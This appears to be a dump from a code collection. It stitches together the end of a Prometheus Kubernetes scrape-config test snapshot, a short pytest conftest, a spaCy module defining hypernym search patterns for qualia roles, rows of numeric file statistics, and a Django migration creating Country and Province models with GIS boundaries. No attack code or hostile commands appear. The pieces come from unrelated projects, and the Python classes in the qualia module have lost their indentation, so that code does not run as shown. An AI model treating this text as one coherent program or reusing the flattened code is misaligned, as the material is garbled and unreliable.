' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' scrape_interval: 1h',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
''
]
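# How this generated snapshot is consumed (a sketch, not part of the file):
# with the snapshottest pytest plugin, the test named in the key above
# asserts its output against the stored list, roughly:
#
#     class TestPromgenK8s:
#         def test_generate(self, snapshot):
#             snapshot.assert_match(generate_config_lines())  # hypothetical helper
#
# When the expected output legitimately changes, the snapshot is regenerated
# with `pytest --snapshot-update`.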
# --- next file: xndtools/kernel_generator/tests/conftest.py (repo: xnd-project/xndtools, license: BSD-3-Clause) ---
# Importing gumath prior to xndtools-generated extension modules avoids
# the following exception:
# ImportError: libgumath.so.0: cannot open shared object file:...
import gumath # noqa: F401
# --- next file: src/formal_sequences.py (repo: TillJohanndeiter/qualia-generator, license: Unlicense) ---
'''
Provide the semantic sequences for the formal qualia role.
'''
from spacy.symbols import NOUN, VERB, conj, nmod, dobj, nsubj, xcomp
from spacy.tokens.doc import Doc
from src.semantic_sequence import SemanticSequence, to_bert_seq, MASK
from src.spacy_utils import ROOT, get_ancestor, get_child
class IsSemanticSequence(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str) -> str:
return qualia_theorem + ' is'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} is a'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[start]
return get_ancestor(qualia_theorem_token, ROOT, NOUN)
class AndOther(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return qualia_theorem + '(,|) and other'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} and other'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
other_token = tokenized_seq[end]
return get_ancestor(other_token, conj, NOUN)
class OrOther(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return qualia_theorem + '(,|) or other'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} or other'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
other_token = tokenized_seq[end]
return get_ancestor(other_token, conj, NOUN)
class IsKindOf(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str) -> str:
return qualia_theorem + ' is(\sa|) kind of'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} is kind of'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
of_token = tokenized_seq[end]
return get_ancestor(of_token, [nmod, ROOT], [NOUN])
class SuchAs(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return 'such as ' + qualia_theorem
def get_search_requests(self, qualia_theorem: str) -> str:
return self.get_regular_expression(qualia_theorem)
def get_bert_input(self, qualia_theorem: str) -> [str]:
return [to_bert_seq('{} such as {}'.format(MASK, qualia_theorem), qualia_theorem)]
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[end]
return get_ancestor(qualia_theorem_token, [dobj, nsubj], NOUN)
class OrOtherPlu(OrOther):
def get_search_requests(self, qualia_theorem: str) -> str:
return '{} or other'.format(qualia_theorem)
class AndOtherPlu(AndOther):
def get_search_requests(self, qualia_theorem: str) -> str:
return '{} and other'.format(qualia_theorem)
class Especially(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return 'especially ' + qualia_theorem
def get_search_requests(self, qualia_theorem: str) -> str:
return self.get_regular_expression(qualia_theorem)
def get_bert_input(self, qualia_theorem: str) -> [str]:
return [to_bert_seq('{} especially {}'.format(MASK, qualia_theorem), qualia_theorem)]
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[end]
verb_token = get_ancestor(qualia_theorem_token, [ROOT, xcomp], VERB)
return get_child(verb_token, dobj, NOUN)
class Including(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return 'including ' + qualia_theorem
def get_search_requests(self, qualia_theorem: str) -> str:
return self.get_regular_expression(qualia_theorem)
def get_bert_input(self, qualia_theorem: str) -> [str]:
return [to_bert_seq('{} including {}'.format(MASK, qualia_theorem), qualia_theorem)]
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[end]
verb_token = get_ancestor(qualia_theorem_token, [ROOT, xcomp], VERB)
return get_child(verb_token, dobj, NOUN)
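Each class pairs a corpus search phrase (get_search_requests) with a regular expression that re-locates the pattern in retrieved text; _handle_pattern_found then walks the spaCy dependency tree from the matched token to the noun filling the qualia role. A standalone check of the IsKindOf regex, using only the standard library (the sentences are invented for illustration):

import re

# The pattern produced by IsKindOf.get_regular_expression('dog'):
pattern = 'dog' + r' is(\sa|) kind of'

for sentence in ('A dog is a kind of domesticated animal.',
                 'A dog is kind of an animal.'):
    print(sentence, '->', bool(re.search(pattern, sentence)))
# Both print True: the (\sa|) group makes the article ' a' optional.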
| 35.064516
| 93
| 0.712971
| 568
| 4,348
| 5.163732
| 0.128521
| 0.217184
| 0.110126
| 0.12956
| 0.841118
| 0.817934
| 0.7985
| 0.780089
| 0.780089
| 0.780089
| 0
| 0
| 0.184223
| 4,348
| 123
| 94
| 35.349594
| 0.826896
| 0.01173
| 0
| 0.540541
| 0
| 0
| 0.04803
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.351351
| false
| 0
| 0.054054
| 0.256757
| 0.878378
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 10
| 10312dbe3512978e13698ac4c7fa7eee3ddc263d
| 3,530
| py
| Python
| wtfapi/migrations/0003_country_province.py
| luismasuelli/wherethefuck
| 6e68543a804c299be4362836c518e34f10029b48
| [ "MIT" ] | 1
| 2019-11-18T15:02:16.000Z
| 2019-11-18T15:02:16.000Z
| wtfapi/migrations/0003_country_province.py
| luismasuelli/wherethefuck
| 6e68543a804c299be4362836c518e34f10029b48
| [ "MIT" ] | null | null | null
| wtfapi/migrations/0003_country_province.py
| luismasuelli/wherethefuck
| 6e68543a804c299be4362836c518e34f10029b48
| [ "MIT" ] | null | null | null
|
# Generated by Django 2.2.4 on 2019-12-02 22:12
from django.conf import settings
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('wtfapi', '0002_auto_20190829_2241'),
    ]

    operations = [
        migrations.CreateModel(
            name='Country',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True, verbose_name='Created On')),
                ('updated_on', models.DateTimeField(auto_now=True, verbose_name='Updated On')),
                ('deleted', models.BooleanField(default=False, editable=False)),
                ('name', models.CharField(max_length=80, verbose_name='Name')),
                ('description', models.TextField(max_length=512, verbose_name='Description')),
                ('internal_notes', models.TextField(blank=True, help_text='These notes are only useful here, in the admin panel, and are never revealed as public data. Use this space to take all the notes you need about this POI.', null=True, verbose_name='Internal Notes')),
                ('boundaries', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326, verbose_name='Boundaries')),
                ('deleted_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
                ('managers', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='managed_country_records', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Country',
                'verbose_name_plural': 'Countries',
            },
        ),
        migrations.CreateModel(
            name='Province',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True, verbose_name='Created On')),
                ('updated_on', models.DateTimeField(auto_now=True, verbose_name='Updated On')),
                ('deleted', models.BooleanField(default=False, editable=False)),
                ('name', models.CharField(max_length=80, verbose_name='Name')),
                ('description', models.TextField(max_length=512, verbose_name='Description')),
                ('internal_notes', models.TextField(blank=True, help_text='These notes are only useful here, in the admin panel, and are never revealed as public data. Use this space to take all the notes you need about this POI.', null=True, verbose_name='Internal Notes')),
                ('boundaries', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326, verbose_name='Boundaries')),
                ('country', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='provinces', to='wtfapi.Country')),
                ('deleted_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
                ('managers', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='managed_province_records', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Province',
                'verbose_name_plural': 'Provinces',
            },
        ),
    ]
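After `python manage.py migrate wtfapi` applies this migration, the schema supports the usual ORM traversals. A minimal usage sketch, assuming the app's models.py mirrors these operations (the import path and helper function are illustrative, inferred from the migration rather than taken from the repository):

from wtfapi.models import Country, Province  # hypothetical import path


def active_provinces(country_name: str):
    # Soft deletion: rows are flagged via the 'deleted' BooleanField
    # rather than removed, so filter it out explicitly.
    country = Country.objects.get(name=country_name, deleted=False)
    # related_name='provinces' on Province.country gives this reverse
    # accessor; PROTECT means a Country with provinces cannot be deleted.
    return country.provinces.filter(deleted=False)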
| 63.035714
| 275
| 0.650425
| 408
| 3,530
| 5.458333
| 0.264706
| 0.088909
| 0.037719
| 0.059273
| 0.825326
| 0.825326
| 0.811855
| 0.811855
| 0.811855
| 0.768747
| 0
| 0.017805
| 0.220397
| 3,530
| 55
| 276
| 64.181818
| 0.791424
| 0.012748
| 0
| 0.571429
| 1
| 0.040816
| 0.234855
| 0.020098
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.081633
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
|